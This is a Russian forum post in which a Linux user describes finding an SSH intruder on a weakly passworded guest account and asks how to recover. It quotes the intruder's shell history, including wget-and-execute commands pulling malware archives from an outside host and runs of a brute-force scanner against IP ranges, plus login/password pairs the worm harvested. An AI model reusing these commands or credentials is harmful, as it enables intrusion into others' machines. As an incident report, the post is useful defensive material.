Сижу значит, лор читаю. И вдруг заметил, что плохо грузиться странички стали. Посмотрел в топ и ахнул:
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
28311 guest 20 0 1720 508 420 R 70.6 0.0 2:38.36 pscan2
25500 root 20 0 376m 34m 9812 S 9.8 1.7 55:58.57 Xorg
Сначало я подумал, что это что в вайне крутиться. Убил - не помогло. Потом заметил странность - юзер guest. Первым делом сменил пароль на guest (а он у меня был guest1, толи guest_guest). Однако текущая сессия не завершилась. Убивал так:
ps h -o pid -U guest | xargs sudo kill -9
Вроде отпустило, уф.
Нашел интересный тред: http://ubuntuforums.org/archive/index.php/t-253373.html
Там узнал про команду last. Меня имели целых три дня (только левые логины):
guest pts/3 80.97.153.252 Wed Nov 26 08:00 - 23:26 (15:25)
guest pts/3 80.97.153.252 Wed Nov 26 05:05 - 05:41 (00:35)
guest pts/2 89.114.144.135 Tue Nov 25 06:42 - 06:43 (00:00)
guest pts/0 80.97.153.252 Tue Nov 25 05:02 - 14:54 (09:51)
guest pts/0 89.114.144.135 Tue Nov 25 04:58 - 05:02 (00:04)
guest pts/10 89.114.144.135 Mon Nov 24 19:29 - 19:30 (00:01)
guest pts/9 a34.csc.lv Mon Nov 24 19:19 - 19:52 (00:33)
Запомните этих ублюдков! (поправка - беспечных пользователей лялиха)
А теперь, что творили на машине (не интересные моменты вырезаны):
$sudo cat /home/guest/.bash_history
wget members.lycos.co.uk/arnibots/vio-linux.tgz;tar xzvf vio-linux.tgz;cd .m;./bash
cd /var/tmp
ls
ls -la
wget members.lycos.co.uk/arnibots/bengos.tgz
tar xzvf bengos.tgz
cd bengos
w
ps -x
cd /var/tmp
ls
cd bengos
ls
cat nobash.txt
cd /var/tmp/bengos
./ a 165.91
./a 165.91
./a 209.155
./a 195.85
./a 64.45
Так-с. Посмотрел файлик /var/tmp/bengos/pass.txt, среди прочего есть пара «guest guest1». Хи, хи.
Кстати, червь мне наворовал порядка двадцати адресков беспечных лялихсойдов. IP публиковать не буду, а вот логин-пароль:
$cat /var/tmp/bengos/nobash.txt | awk '{print $1 "\t" $2}'
admin sysmail
admin sysmail
admin sysmail
admin sysmail
root beach
root beach
root beach
stud stud
trash trash
aaron aaron123
admin sysmail
admin sysmail
stud stud
trash trash
aaron aaron123
gt05 gt05
test abc123
Исходники на сканер приложены, а вот на бинарь ss и sshd нет.
echo "[] [] [] [][] [][] [] [][][] [] []"
echo "[] [] [] [] [] [] [] [][] [] [] []"
echo "[][] [] [] [] [][] [] [] [] [][]"
echo "[] [] [] [] [] [] [] [][] [] [] []"
echo "[] [] [] [][] [] [] [] [][][] [] []"
echo "[*] Scanner Made bY KidRock & The #KidRockS Team [*]"
Собственно несколько вопросов:
1. Что делать? Достаточно ли сменить пароль?
2. Как прибить пользователя (logout)? Есть ли какая команда?
P.S. Теперь и на лоре есть полужирный бибикот!